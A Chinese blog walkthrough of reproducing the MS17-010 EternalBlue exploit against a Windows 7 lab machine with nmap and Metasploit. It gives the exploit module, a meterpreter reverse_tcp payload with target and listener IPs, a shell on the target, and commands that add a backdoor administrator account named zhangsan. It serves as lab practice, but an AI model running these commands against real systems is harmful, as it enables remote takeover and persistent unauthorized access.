MS17-010(永恒之蓝)漏洞复现

准备工作

 查看目标IP地址和445端口 

 使用ipconfig查看Win7IP地址

在Kali上使用nmap 192.168.79.145命令查看win7445端口是否打开。(这里如果无法访问目标IP,请检查目标防火墙是否关闭或者是否允许访问)

 

打开Metasploit框架

使用msfconsole命令,进入msf6界面即算成功。(这是一款集合各种漏洞和后期利用工具的框架)

使用MS17-010漏洞

搜索MS17-010漏洞search ms17_010,找到“永恒之蓝”漏洞(第1条eternalblue)

打开漏洞use exploit/windows/smb/ms17_010_eternalblue

设置相关参数

set rhost 192.168.79.145 //设置目标主机

set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块)。

set lhost 192.168.1.109 //设置本机ip地址(用来攻击成功之后,监听被开放的目标电脑的端口)

设置好后使用show options查看参数是否设置成功

 

攻击目标

使用run运行攻击程序

进入meterpreter界面就算攻击成功(这里出现了报错,网上说是目标机有其他安全防护,本目标机没有其他安全防护,且攻击指令能够正常运行,不予管理) 

使用shell进入目标机操作系统

这里出现乱码,可以使用chcp 65001解决(这里可以看到已经进入目标主机,并且查看到目标用户)

使用

nat user zhangsan /add    #创建zhangsan用户

这里可以看到zhangsan用户已经被添加到目标用户。

将zhangsan添加到管理员组

net localgroup administrators zhangsan /add  #将zhangsan加入管理员用户组

之后便可以进行各种操作。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值